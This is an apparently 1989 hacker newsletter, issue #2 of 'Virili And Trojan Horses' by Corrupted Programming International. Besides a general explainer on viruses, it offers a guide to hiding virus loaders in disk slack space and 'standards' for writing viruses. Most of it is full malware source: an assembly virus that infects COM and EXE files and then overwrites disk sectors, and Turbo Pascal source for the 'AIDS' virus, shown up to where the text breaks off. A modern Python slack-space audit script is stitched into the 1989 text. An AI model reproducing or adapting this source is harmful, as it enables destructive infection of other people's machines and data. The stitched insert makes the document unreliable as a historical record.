
Computer viruses - a protagonist's point of view


[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* *
* @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
* @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
* @@@@ @@@@ @@@@ @@@@ @@@ *
* @@@ @@@ @@@@ @@@ *
* @@@ @@@@@@@@@@@@@@@ @@@ *
* @@@ @@@@@@@@@@@@@@ @@@ *
* @@@ @@@ @@@ *
* @@@@ @@@@ @@@ @@@ *
* @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
* @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
* *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *

C O R R U P T E D

P R O G R A M M I N G

I N T E R N A T I O N A L


presents:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ Virili And Trojan Horses @
@ @
@ A Protagonist's Point Of View @
@ @
@ Issue #2 @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@





DISCLAIMER::All of the information contained in this newsletter reflects the
thoughts and ideas of the authors, not their actions. The sole
purpose of this document is to educate and spread information.
Any illegal or illicit action is not endorsed by the authors or
CPI. The authors and CPI are not responsible for any information
which may present itself as old or mis-interpreted, and actions
by the reader. Remember, 'Just Say No!'








CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Introduction To CPI#2
---------------------
Well, here is the "long awaited" second issue of CPI, A Protagonist's Point
of view. This issue should prove a bit interesting, I dunno, but at least
entertaining for the time it takes to read. Enjoy the information and don't
forget the disclaimer.
Oh yes, if you have some interesting articles or an application to send
us, just see the BBS list at the end of this document. Thanx. All applications
and information will be voted on through the CPI Inner Circle. Hope you enjoy
this issue as much as we enjoyed typing it... hehe...
Until our next issue, (which may be whenever), good-bye.

Doctor Dissector

Table of Contents
-----------------
Part Title Author
-----------------------------------------------------------------------------
2.1 Title Page, Introduction, & TOC....................... Doctor Dissector
2.2 Another Explanation Of Virili And Trojans............. Acid Phreak
2.3 V-IDEA-1.............................................. Ashton Darkside
2.4 V-IDEA-2.............................................. Ashton Darkside
2.5 The Generic Virus..................................... Doctor Dissector
2.6 Aids.................................................. Doctor Dissector
2.7 Batch File Virus...................................... PHUN 3.2
2.8 Basic Virus........................................... PHUN 3.2
2.9 The Alemeda Virus..................................... PHUN 4.3
2.10 Virili In The News.................................... Various Sources
2.11 Application For CPI................................... CPI Inner Circle
(CPI Node Phone #'s Are In 2.11)
[2.2]
Explanation of Viruses and Trojans Horses
-----------------------------------------
Written by Acid Phreak

Like its biological counterpart, a computer virus is an agent of
infection, insinuating itself into a program or disk and forcing its host
to replicate the virus code. Hackers fascinated by the concept of "living"
code wrote the first viruses as projects or as pranks. In the past few
years, however, a different kind of virus has become common, one that lives
up to an earlier meaning of the word: in Latin, virus means poison.
These new viruses incorporate features of another type of insidious
program called a Trojan horse. Such a program masquerades as a useful
utility or product but wreaks havoc on your system when you run it. It may
erase a few files, format your disk, steal secrets--anything software can
do, a Trojan horse can do. A malicious virus can do all this then attempt
to replicate itself and infect other systems.
The growing media coverage of the virus concept and of specific viruses
has promoted the development of a new type of software. Antivirus programs,
vaccines--they go by many names, but their purpose is to protect from virus
attack. At present there are more antivirus programs than known viruses
(not for long).
Some experts quibble about exactly what a virus is. The most widely
known viruses, the IBM Xmas virus and the recent Internet virus, are not
viruses according to some experts because they do not infect other programs.
Others argue that every Trojan horse is a virus--one that depends completely
on people to spread it.

How They Reproduce:
-------------------
Viruses can't travel without people. Your PC will not become infected
unless someone runs an infected program on it, whether accidentally or on
purpose. PC's are different from mainframe networks in this way--the
mainframe Internet virus spread by transmitting itself to other systems and
ordering them to execute it as a program. That kind of active transmission
is not possible on a PC.
Virus code reproduces by changing something in your system. Some viruses
strike COMMAND.COM or the hidden system files. Others, like the notorious
Pakistani-Brain virus, modify the boot sector of floppy disks. Still others
attach themselves to any .COM or .EXE file. In truth, any file on your
system that can be executed--whether it's a program, a device driver, an
overlay, or even a batch file--could be the target of a virus.
When an infected program runs, the virus code usually executes first and
then transfers control to the original program. The virus may immediately
infect other programs, or it may load itself into RAM and continue spreading.
If the virus can infect a file that will be used on another system, it has
succeeded.

What They Can Do:
-----------------
Viruses go through two phases: a replication phase and an action phase.
The action doesn't happen until a certain event occurs--perhaps reaching a
special date or running the virus a certain number of times. It wouldn't
make sense for a virus to damage your system the first time it ran; it needs
some time to grow and spread first.
The most vulnerable spot for a virus attack is your hard disk's file
allocation table (FAT). This table tells DOS where every file's data resides
on the disk. Without the FAT, the data's still there but DOS can't find it.
A virus could also perform a low-level format on some or all the tracks of
your hard disk, erase all files, or change the CMOS memory on AT-class
computers so that they don't recognize the hard disk.
Most of the dangers involve data only, but it's even possible to burn
out a monochrome monitor with the right code.
Some virus assaults are quite subtle. One known virus finds four
consecutive digits on the screen and switches two. Let's hope you're not
balancing the company's books when this one hits. Others slow down system
operations or introduce serious errors.
[2.3]
-------------------------------------------------------------------------------
______ ________ ___________
/ ____ \ | ____ \ |____ ____|
| / \_| | | \ | | |
| | | |_____| | | |
| | | ______/ | |
| | _ | | | |
| \____/ | /\ | | /\ ____| |____ /\
\______/ \/ |_| \/ |___________| \/

"We ain't the phucking Salvation Army."

-------------------------------------------------------------------------------

C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L

* * * present * * *

"Ok, I've written the virus, now where the hell do I put it?"

By Ashton Darkside (DUNE / SATAN / CPI)

*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk a lot, but we "just say no" to doing it.
*******************************************************************************

Ok, wow! You've just invented the most incredibly nifty virus. It
slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data!
But the only problem is, if you go around infecting every damn file, some cute
software company is going to start putting in procedures that checksum their
warez each time they run, which will make life for your infecting virus a total
bitch. Or somebody's going to come up with an incredibly nifty vaccination util
that will wipe it out. Because, I mean, hey, when disk space starts vanishing
suddenly in 500K chunks people tend to notice. Especially people like me that
rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying
"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need
to go around wasting your precious time when the answer is right there in front
of you! Think about it, you could be putting that time into writing better and
more innovative viruses, or you could be worrying about keeping the file size,
the date & time, and the attributes the same. With this system, you only need
to infect one file, preferably one that's NOT a system file, but something that
will get run a lot, and will be able to load your nifty virus on a daily basis.
This system also doesn't take up any disk space, other than the loader. And the
loader could conceivably be under 16 bytes (damn near undetectable). First of
all, you need to know what programs to infect. Now, everybody knows about using
COMMAND.COM and that's unoriginal anyway, when there are other programs people
run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or
WordPerfect; you get the idea. Better still are dos commands like Format, Link
or even compression utilities. But you get the point. Besides, who's going to
miss 16 bytes, right? Now, the good part: where to put the damn thing. One note
to the programmer: This could get tricky if your virus is over 2k or isn't
written in Assembly, but the size problem is easy enough, it would be a simple
thing to break your virus into parts and have the parts load each other into
the system so that you do eventually get the whole thing. The only problem with
using languages besides assembly is that it's hard to break them up into 2k
segments. If you want to infect floppies, or smaller disks, you'd be best off to
break your file into 512 byte segments, since they're easier to hide. But, hey,
in assembly, you can generate pretty small programs that do a lot, tho. Ok, by
now you've probably figured out that we're talking about the part of the disk
called 'the slack'. Every disk that your computer uses is divided up into parts
called sectors, which are (in almost all cases) 512 bytes. But in larger disks,
and even in floppies, keeping track of every single sector would be a complete
bitch. So the sectors are bunched together into groups called 'clusters'. On
floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard
disks, they're typically 4096 bytes, or eight sectors. Now think about it, you
have programs on your hard disk, and what are the odds that they will have
sizes that always end up in increments of 4096? If I've lost you, think of it
this way: the file takes up a bunch of clusters, but in the last cluster it
uses, there is usually some 'slack', or space that isn't used by the file. This
space is between where the actual file ends and where the actual cluster ends.
So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard
disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton
program 'FS /S /T' command from your root directory, and subtract the total
size of the files from the total disk space used. That's how much 'slack' space
is on your disk (a hell of a lot, even on a floppy). To use the slack, all you
need to do is to find a chunk of slack big enough to fit your virus (or a
segment of your virus) and use direct disk access (INT 13) to put your virus
there. There is one minor problem with this. Any disk write to that cluster
will overwrite the slack with 'garbage' from memory. This is because of the way
DOS manages its disk I/O and it can't be fixed without a lot of hassles. But,
there is a way around even this. And it involves a popular (albeit outdated and
usually ineffectual) form of virus protection called the READ-ONLY flag. This
flag is the greatest friend of this type of virus. Because if the file is not
written to, the last cluster is not written to, and voila! Your virus is safe
from mischievous accidents. And since the R-O flag doesn't affect INT 13 disk
I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set
because that has the same Read-only effect (even tho I haven't seen it written,
it's true that if the file is designated system, DOS treats it as read-only,
whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM
in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too
lazy to find out myself) or a protected (!) COMMAND.COM file in either type of
DOS would be ideal for this. All you have to do is then insert your loader into
some innocent-looking file, and you are in business. All your loader has to do
is read the sector into the highest part of memory, and do a far call to it.
Your virus can then go about waiting for floppy disks to infect, and place
loaders on any available executable file on the disk. Sound pretty neat? It is!
Anyway, have fun, and be sure to upload your virus, along with a README file on
how it works to CPI Headquarters so we can check it out! And remember: don't
target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if
the Sysop is a leech and you want to shove his balls down his throat. Because
if all the PHP boards go down (especially members of CPI), who the hell can you
go to for all these nifty virus ideas? And besides, it's betraying your own
people, which is uncool even if you are an anarchist. So, target uncool PD
boards, or your boss's computer or whatever, but don't attack your friends.
Other than that, have phun, and phuck it up!

Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)

PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk).

Call these boards because the sysops are cool:
Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader)
System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader)
The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader)
D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader)
The Jolly Bardsmen's Pub & Tavern
The Sierra Crib
The Phrozen Phorest
Knight Shadow's Grotto

And if I forgot your board, sorry, but don't send me E-mail bitching about it!
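The article's "FS /S /T" arithmetic and its claim that slack is invisible both reduce to one check a defender can automate: compute how many bytes sit between each file's end and the end of its last cluster, then look at what those bytes actually contain. A freshly formatted cluster is zero-filled, so non-zero bytes in slack are worth a second look. The following is an added example, not code from CPI or this article; the disk image, the directory entries, and the assumption that files occupy contiguous clusters (no FAT chain is parsed) are all constructed here for illustration.

```python
"""Slack-space audit for a cluster-based disk.

Added example (not CPI's code): computes the per-file and total slack the
article describes, then checks whether a file's slack region holds anything
other than the zero fill a freshly formatted cluster would contain. The disk
image and directory entries below are constructed inline and assume files
occupy contiguous clusters (no FAT chain is parsed)."""

CLUSTER_FLOPPY = 1024  # two 512-byte sectors, per the article
CLUSTER_HARD = 4096    # eight 512-byte sectors, per the article


def clusters_used(file_size, cluster_size):
    """Clusters allocated to a file of file_size bytes (last one partly used)."""
    return (file_size + cluster_size - 1) // cluster_size


def slack_bytes(file_size, cluster_size):
    """Unused bytes between end-of-file and the end of its last cluster."""
    if file_size == 0:
        return 0
    return clusters_used(file_size, cluster_size) * cluster_size - file_size


def total_slack(sizes, cluster_size):
    """The 'FS /S /T' subtraction: allocated space minus the summed file sizes."""
    allocated = sum(clusters_used(s, cluster_size) * cluster_size for s in sizes)
    return allocated - sum(sizes)


def find_nonzero_slack(image, entries, cluster_size):
    """entries: (name, first_cluster, size). Returns (name, slack_len, offset)
    for every file whose slack region contains a non-zero byte."""
    flagged = []
    for name, first_cluster, size in entries:
        start = first_cluster * cluster_size
        end = start + size
        cluster_end = start + clusters_used(size, cluster_size) * cluster_size
        region = image[end:cluster_end]
        if any(region):  # zero fill is expected; anything else merits a look
            flagged.append((name, len(region), end))
    return flagged


# Constructed sample: a four-cluster floppy-style image with two .COM files.
SAMPLE_CLUSTER = CLUSTER_FLOPPY
SAMPLE_ENTRIES = [("GOOD.COM", 0, 700), ("EDIT.COM", 1, 600)]
HIDDEN = b"constructed-hidden-payload-marker"


def build_sample_image():
    image = bytearray(4 * SAMPLE_CLUSTER)
    for _name, first_cluster, size in SAMPLE_ENTRIES:
        start = first_cluster * SAMPLE_CLUSTER
        image[start:start + size] = b"\xcc" * size  # stand-in for program bytes
    # Plant bytes in EDIT.COM's slack, just past its end-of-file.
    tail = 1 * SAMPLE_CLUSTER + 600
    image[tail:tail + len(HIDDEN)] = HIDDEN
    return bytes(image)


def audit_sample():
    return find_nonzero_slack(build_sample_image(), SAMPLE_ENTRIES, SAMPLE_CLUSTER)


if __name__ == "__main__":
    for name, _c, size in SAMPLE_ENTRIES:
        print(f"{name}: {slack_bytes(size, SAMPLE_CLUSTER)} bytes of slack")
    print("total slack:", total_slack([s for _, _, s in SAMPLE_ENTRIES], SAMPLE_CLUSTER))
    print("non-zero slack:", audit_sample())
```

On a real volume the contiguity assumption does not hold; the last cluster of each file has to be located through the FAT chain, and slack left by an earlier, larger occupant of the same cluster will also show up as non-zero, so a hit is a lead for closer inspection rather than a verdict.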
[2.4]
-------------------------------------------------------------------------------
______ ________ ___________
/ ____ \ | ____ \ |____ ____|
| / \_| | | \ | | |
| | | |_____| | | |
| | | ______/ | |
| | _ | | | |
| \____/ | /\ | | /\ ____| |____ /\
\______/ \/ |_| \/ |___________| \/

"We ain't the phucking Salvation Army."

-------------------------------------------------------------------------------

C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L

* * * present * * *

CPI Virus Standards - Protect yourself and your friends

By Ashton Darkside (DUNE / SATAN / CPI)

*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk a lot, but we "just say no" to doing it.
*******************************************************************************

One of the main problems with viruses is that once you set one loose,
it is no longer under your control. I propose to stop this by introducing some
standards of virus writing that will enable them to be deactivated whenever
they enter a 'friendly' (CPI) system. In the long run, even the author of the
virus is not immune to being attacked. The following are what I have termed the
CPI standards for writing viruses. They will allow a virus to easily check any
system they are being run on for a type of 'identity badge'. If it is found,
the virus will not infect the system it is being run on. The other standards
are mostly written around this.

CPI Standards for writing viruses -

1 - The virus will have an 'active period' and an 'inactive period'.
The active periods will be no more than one year in length (to make
it more difficult to discover the virus). You may release different
versions of your virus with different 'active periods'. It is not
recommended that your virus deactivate itself after the set active
period, as this would enable people to deactivate viruses by using
their computer with the date set to 2069 or something. It is also
required that activation periods begin on January 1 and end on
December 31. This will coincide with the changing identity codes.

2 - The virus will check for an identity code by executing Interrupt
12h with the following register settings: AX - 4350, BX - 4920,
CX - AB46, DX - 554E. If the system is friendly, then a pointer
will be returned in CX:DX to an ASCIIZ (0-terminated) string which
will have different contents in different years. The codes are not
to be included in any text file, and should only be given through
E-mail on CPI affiliated systems. You can always ask me by sending
me mail at The Andromeda Strain BBS. If a system is detected as
friendly, the virus will not attempt to infect or damage it, but it
is ok to display a little greeting message about how lucky the
user was.

3 - We very much encourage you to upload your virus, along with a brief
description on the workings into the CPI section at The Andromeda
Strain BBS. Only CPI members will know about your virus. This is
so that CPI members can share techniques and it also allows us to
verify that the identity check works. If we see any improvements
that could be made, such as ways to streamline code, better ways of
spreading, etc. we will inform you so that you can make the changes
if you wish.

4 - It is also suggested that you use ADS standard for virus storage on
infected disks. This method uses disk slack space for storage and
is more thoroughly described in a previous text file by me. I think
that this is the most effective and invisible way to store viruli.

5 - A list of CPI-Standard viruli will be available at all times from
The Andromeda Strain BBS, to CPI users. Identity strings will also
be available to anyone in CPI, or anyone who uploads source code to
a virus which is 100% complete except for the Identity string (it
must be written to CPI-Standards). Non-CPI members who do this will
be more seriously considered for membership in CPI.

Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)

PS: This file (by itself) has approx 2.5k of slack.
;[2.5]
;=============================================================================
;
; C*P*I
;
; CORRUPTED PROGRAMMING INTERNATIONAL
; -----------------------------------
; p r e s e n t s
;
; T H E
; _ _
; (g) GENERIC VIRUS (g)
; ^ ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO
; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI INNER CIRCLE
;
;=============================================================================

MAIN:
NOP ;| Marker bytes that identify this program
NOP ;| as infected/a virus
NOP ;|

MOV AX,00 ;| Initialize the pointers
MOV ES:[POINTER],AX ;|
MOV ES:[COUNTER],AX ;|
MOV ES:[DISKS B],AL ;|

MOV AH,19 ;| Get the selected drive (dir?)
INT 21 ;|

MOV CS:DRIVE,AL ;| Get current path (save drive)
MOV AH,47 ;| (dir?)
MOV DH,0 ;|
ADD AL,1 ;|
MOV DL,AL ;| (in actual drive)
LEA SI,CS:OLD_PATH ;|
INT 21 ;|

MOV AH,0E ;| Find # of drives
MOV DL,0 ;|
INT 21 ;|
CMP AL,01 ;| (Check if only one drive)
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)

HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
LEA BX,SEARCH_ORDER ;|
ADD BX,AX ;|
ADD BX,0001 ;|
MOV CS:POINTER,BX ;|
CLC ;|

CHANGE_DISK: ;| Carry is set if no more .COM files are
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program
INT 21 ;| to large to fit in memory" when starting
CMP AL,0FF ;| larger infected programs
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)

MOV AH,2CH ;| If neither .COM or .EXE files can be found,
INT 21 ;| then random sectors on the disk will be
MOV BX,CS:POINTER ;| overwritten depending on the system time
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
MOV BX,DX ;| complete "infection" of a storage medium.
MOV CX,2 ;| The virus can find nothing more to infect
MOV DH,0 ;| starts its destruction.
INT 26 ;| (write crap on disk)

NO_NAME_CHANGE: ;| Check if the end of the search order table
MOV BX,CS:POINTER ;| has been reached. If so, end.
DEC BX ;|
MOV CS:POINTER,BX ;|
MOV DL,CS:[BX] ;|
CMP DL,0FF ;|
JNZ HUPS2 ;|
JMP HOPS ;|

HUPS2: ;| Get a new drive from the search order table
MOV AH,0E ;| and select it, beginning with the ROOT dir.
INT 21 ;| (change drive)
MOV AH,3B ;| (change path)
LEA DX,PATH ;|
INT 21 ;|
JMP FIND_FIRST_FILE ;|

FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
MOV AH,17 ;| first subdir. First, (change .exe to .com)
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
INT 21 ;| old directory.
MOV AH,3B ;| (use root directory)
LEA DX,PATH ;|
INT 21 ;|
MOV AH,04E ;| (search for first subdirectory)
MOV CX,00010001B ;| (dir mask)
LEA DX,MASKE_DIR ;|
INT 21 ;|
JC CHANGE_DISK ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
DEC BX ;|
JZ USE_NEXT_SUBDIR ;|

FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
MOV AH,4FH ;| are found, the (search for next subdir)
INT 21 ;| drive will be changed.
JC CHANGE_DISK ;|
DEC BX ;|
JNZ FIND_NEXT_SUBDIR ;|

USE_NEXT_SUBDIR:
MOV AH,2FH ;| Select found directory. (get dta address)
INT 21 ;|
ADD BX,1CH ;|
MOV ES:[BX],W"\" ;| (address of name in dta)
INC BX ;|
PUSH DS ;|
MOV AX,ES ;|
MOV DS,AX ;|
MOV DX,BX ;|
MOV AH,3B ;| (change path)
INT 21 ;|
POP DS ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
MOV CS:COUNTER,BX ;|

FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
MOV AH,04E ;| If there are none, (Search for first)
MOV CX,00000001B ;| search the next directory. (mask)
LEA DX,MASKE_COM ;|
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
JMP CHECK_IF_ILL ;|

FIND_NEXT_FILE: ;| If program is ill (infected) then search
MOV AH,4FH ;| for another. (search for next)
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|

CHECK_IF_ILL: ;| Check if already infected by virus.
MOV AH,3D ;| (open channel)
MOV AL,02 ;| (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| (save channel)
MOV AH,3FH ;| (read file)
MOV CH,BUFLEN ;|
MOV DX,BUFFER ;| (write in buffer)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV BX,CS:[BUFFER] ;| (look for three NOP's)
CMP BX,9090 ;|
JZ FIND_NEXT_FILE ;|

MOV AH,43 ;| This section by-passes (write enable)
MOV AL,0 ;| the MS/PC DOS Write Protection.
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV AH,43 ;|
MOV AL,01 ;|
AND CX,11111110B ;|
INT 21 ;|

MOV AH,3D ;| Open file for read/write (open channel)
MOV AL,02 ;| access (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|

MOV BX,AX ;| Read date entry of program and (channel)
MOV AH,57 ;| save for future use. (get date)
MOV AL,0 ;|
INT 21 ;|
PUSH CX ;| (save date)
PUSH DX ;|

MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
MOV DX,CS:[BUFFER+1] ;| (save new jump)
LEA CX,CONT-100 ;|
SUB DX,CX ;|
MOV CS:[CONTA],DX ;|

MOV AH,57 ;| The virus now copies itself to (write date)
MOV AL,1 ;| to the start of the file.
POP DX ;|
POP CX ;| (restore date)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|

MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the
;| start of the program. This is done to
HOPS: ;| preserve the executability of the host
NOP ;| program as much as possible. After saving,
CALL USE_OLD ;| it still works with the jump address in the
;| virus. The jump address in the virus differs
;| from the jump address in memory

CONT DB 0E9 ;| Continue with the host program (make jump)
CONTA DW 0 ;|
MOV AH,00 ;|
INT 21 ;|

USE_OLD:
MOV AH,0E ;| Reactivate the selected (use old drive)
MOV DL,CS:DRIVE ;| drive at the start of the program, and
INT 21 ;| reactivate the selected path at the start
MOV AH,3B ;| of the program.(use old drive)
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
INT 21 ;|
RET ;|

SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF

POINTER DW 0000 ;| (pointer f. search order)
COUNTER DW 0000 ;| (counter f. nth. search)
DISKS DB 0 ;| (number of disks)
MASKE_COM DB "*.COM",00 ;| (search for com files)
MASKE_DIR DB "*",00 ;| (search for dir's)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
DB 0,"????????EXE",0,0,0,0
DB 0,"????????COM",0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
DB 0,"???????????",0,0,0,0
DB 0,"????????COM",0

BUFFER EQU 0E00 ;| (a safe place)

BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
;| if you modify this source. Be careful
;| for this may change!

JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)

PATH DB "\",0 ;| (first place)
DRIVE DB 0 ;| (actual drive)
BACK_SLASH DB "\"
OLD_PATH DB 32 DUP (?) ;| (old path)
[2.6]
+-------------------------------+ +--------------------------------------+
| | P | |
| @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### |
| @@ @@ @@ @@ | R | # # # # # # |
| @@ @@ @@ @@ | * | ##### # # # ##### |
| @@ @@@@@@@@ @@ | E | # # # # # # |
| @@ @@ @@ | * | # # ##### #### ##### |
| @@ @@ @@ | S | |
| @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+
| | E | A NEW AND IMPROVED VIRUS FOR |
+-------------------------------+ * | PC/MS DOS MACHINES |
| C O R R U P T E D | N +--------------------------------------+
| | * | CREATED BY: DOCTOR DISSECTOR |
| P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY|
| | * | AUTHOR NOT RESPONSIBLE FOR READERS |
| I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS|
+-------------------------------+ +--------------------------------------+

Well well, here it is... I call it AIDS... It infects all COM files, but it is
not perfect, so it will also change the date/time stamp to the current system.
Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them!

Anyway, this virus was originally named NUMBER ONE, and I modified the code so
that it would fit my needs. The source code, which is included with this neato
package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works.

Well, I added a few things, you can experiment or mess around with it if you'd
like to, and add any mods to it that you want, but change the name and give us
some credit if you do.

The file is approximately 13k long, and this extra memory will be added to the
file it picks as host. If no more COM files are to be found, it picks a random
value from 1-10, and if it happens to be the lucky number 7, AIDS will present
a nice screen with lots of smiles, with a note telling the operator that their
system is now screwed, I mean permanently. The files encrypted containing AIDS
in their code are IRREVERSIBLY messed up. Oh well...

Again, neither CPI nor the author of Number One or AIDS endorses this document
and program for use in any illegal manner. Also, CPI, the author to Number One
and AIDS is not responsible for any actions by the readers that may prove harm
in any way or another. This package was written for EDUCATIONAL purposes only!

{ Beginning of source code, Turbo Pascal 3.01a }
{C-}
{U-}
{I-} { Wont allow a user break, enable IO check }

{ -- Constants --------------------------------------- }

Const
VirusSize = 13847; { AIDS's code size }

Warning :String[42] { Warning message }
= 'This File Has Been Infected By AIDS! HaHa!';

{ -- Type declarations------------------------------------- }

Type
DTARec =Record { Data area for file search }
DOSnext :Array[1..21] of Byte;
Attr : Byte;
Ftime,
FDate,
FLsize,
FHsize : Integer;
FullName: Array[1..13] of Char;
End;

Registers = Record {Register set used for file search }
Case Byte of
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
End;

{ -- Variables--------------------------------------------- }

Var
{ Memory offset program code }
ProgramStart : Byte absolute Cseg:$100;
{ Infected marker }
MarkInfected : String[42] absolute Cseg:$180;
Reg : Registers; { Register set }
DTA : DTARec; { Data area }
Buffer : Array[Byte] of Byte; { Data buffer }
TestID : String[42]; { To recognize infected files }
UsePath : String[66]; { Path to search files }
{ Lenght of search path }
UsePathLenght: Byte absolute UsePath;
Go : File; { File to infect }
B : Byte; { Used }
LoopVar : Integer; {Will loop forever}

{ -- Program code------------------------------------------ }

Begin
GetDir(0, UsePath); { get current directory }
if Pos('\', UsePath) <> UsePathLenght then
UsePath := UsePath + '\';
UsePath := UsePath + '*.COM'; { Define search mask }
Reg.AH := $1A; { Set data area }
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
Reg.AH := $4E;
Reg.DS := Seg(UsePath);
Reg.DX := Ofs(UsePath[1]);
Reg.CX := $ff; { Set attribute to find ALL files }
MsDos(Reg); { Find first matching entry }
IF not Odd(Reg.Flags) Then { If a file found then }
Repeat
UsePath := DTA.FullName;
B := Pos(#0, UsePath);
If B > 0 then
Delete(UsePath, B, 255); { Remove garbage }
Assign(Go, UsePath);
Reset(Go);
If IOresult = 0 Then { If not IO error then }
Begin
BlockRead(Go, Buffer, 2);
Move(Buffer[$80], TestID, 43);
{ Test if file is already ill (infected) }
If TestID <> Warning Then { If not then ... }
Begin
Seek (Go, 0);
{ Mark file as infected and .. }
MarkInfected := Warning;
{ Infect it }
